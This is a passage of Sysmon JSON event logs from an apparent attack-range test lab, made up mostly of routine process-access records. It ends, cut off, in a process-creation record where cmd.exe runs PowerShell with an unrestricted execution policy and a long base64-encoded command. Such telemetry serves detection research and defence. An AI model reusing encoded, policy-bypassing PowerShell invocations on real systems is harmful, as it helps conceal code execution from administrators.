C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:45.787","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8486,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:45.787\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:45.787","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8487,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:45.787\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:45.787","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8488,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:45.787\r\nSourceProcessGUID: {41C8662E-22D1-5F25-0000-00107FAD1100}\r\nSourceProcessId: 3592\r\nSourceThreadId: 4220\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-22D1-5F25-0000-001012B01100}\r\nTargetProcessId: 5064\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:45.787","SourceProcessGUID":"{41C8662E-22D1-5F25-0000-00107FAD1100}","SourceProcessId":"3592","SourceThreadId":"4220","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-22D1-5F25-0000-001012B01100}","TargetProcessId":"5064","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":8489,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:45.803\r\nProcessGuid: {41C8662E-22D1-5F25-0000-0010DDB01100}\r\nProcessId: 5016\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nFileVersion: 10.0.14393.206 (rs1_release.160915-0644)\r\nDescription: Windows PowerShell\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: PowerShell.EXE\r\nCommandLine: PowerShell  -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {41C8662E-22D1-5F25-0000-00205EAC1100}\r\nLogonId: 0x11AC5E\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453\r\nParentProcessGuid: {41C8662E-22D1-5F25-0000-001012B01100}\r\nParentProcessId: 5064\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 08:07:45.803","ProcessGuid":"{41C8662E-22D1-5F25-0000-0010DDB01100}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","FileVersion":"10.0.14393.206 (rs1_release.160915-0644)","Description":"Windows PowerShell","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"PowerShell.EXE","CommandLine":"PowerShell  -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQg